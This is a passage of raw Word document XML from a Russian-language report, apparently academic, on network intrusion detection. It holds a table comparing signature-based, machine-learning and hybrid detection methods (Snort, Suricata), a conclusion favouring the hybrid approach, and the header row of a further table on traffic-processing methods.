              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B2F93CF"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Высокая (≥95%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B462D63"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Средняя (70–85%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E4809DA"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Высокая (≥93%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00967078" w14:paraId="417DD678" w14:textId="77777777" w:rsidTr="00967078">
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3861" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A6F5717" w14:textId="20804F4C"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 xml:space="preserve">Возможность обнаружения </w:t>
            </w:r>
            <w:r w:rsidR="003770F2" w:rsidRPr="00967078">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>уязвимостей нулевого дня</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1853" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C6CBA89"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Отсутствует</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="223D07EB"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Присутствует</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A657673"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 xml:space="preserve">Присутствует </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00967078" w14:paraId="2DDEDBAD" w14:textId="77777777" w:rsidTr="00967078">
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3861" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13999862"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Уровень ложных срабатываний</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1853" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06779277"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Низкий</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="343A8ED0"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 xml:space="preserve">Высокий </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45858227"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 xml:space="preserve">Средний </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00967078" w14:paraId="4E54F140" w14:textId="77777777" w:rsidTr="00967078">
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3861" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="599E3697"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Требования к вычислительным ресурсам</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1853" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25A12848"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Низкие</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32931B70"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Высокие</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="509063E4"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Средние</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00967078" w14:paraId="748E3251" w14:textId="77777777" w:rsidTr="00967078">
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3861" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BB812C5"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Зависимость от качества обучающей выборки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1853" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FB4E655"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Низкая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69F531C1"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Критическая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E82A202"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Средняя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00967078" w14:paraId="13FB6870" w14:textId="77777777" w:rsidTr="00967078">
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3861" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E2D368E"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Применимость к зашифрованному трафику</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1853" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77929310"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 xml:space="preserve">Ограничена </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D20D6D4"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 xml:space="preserve">Высокая </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FDE7354"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Высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00967078" w14:paraId="5F55E6B5" w14:textId="77777777" w:rsidTr="00967078">
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3861" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EE23B2C"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Примеры реализации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1853" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3804E073"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00967078">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Snort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00967078">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00967078">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Suricata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00967078">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1913" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E2370F9"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Нейросетевые модули</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20B1C817" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00967078" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00967078">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00967078">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Suricata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00967078">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> + ML-плагин</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D808B1C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36AD2E4C" w14:textId="77256155" w:rsidR="002E66B7" w:rsidRDefault="008E0171" w:rsidP="00C022BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA46DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Как следует из таблицы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA46DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, для решения задачи обнаружения аномалий в трафике и выявления неизвестных угроз наиболее перспективным является гибридный подход, реализуемый на базе методов машинного обучения.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> В таблице 10 представлено сравнение методов обработки сетевого трафика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECFF7F4" w14:textId="77777777" w:rsidR="00E27915" w:rsidRDefault="00E27915" w:rsidP="00C022BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30EC3AF9" w14:textId="3CB61FD8" w:rsidR="008E0171" w:rsidRDefault="002E66B7" w:rsidP="00E27915">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>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E0171" w:rsidRPr="00F50EDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00F50EDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Сравнение методов обработки </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9634" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2737"/>
        <w:gridCol w:w="1794"/>
        <w:gridCol w:w="1490"/>
        <w:gridCol w:w="1562"/>
        <w:gridCol w:w="2051"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00967078" w14:paraId="0D152CC2" w14:textId="77777777" w:rsidTr="00C022BB">
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="719F1E06"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Метод обработки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="004FB588"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Скорость (пакетов/сек)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CF3E4DF"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Точность детекции</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="039FF6EA"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Поддержка потоковой обработки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2051" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AD01DD5"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 xml:space="preserve">Сложность внедрения в </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C022BB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Suricata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
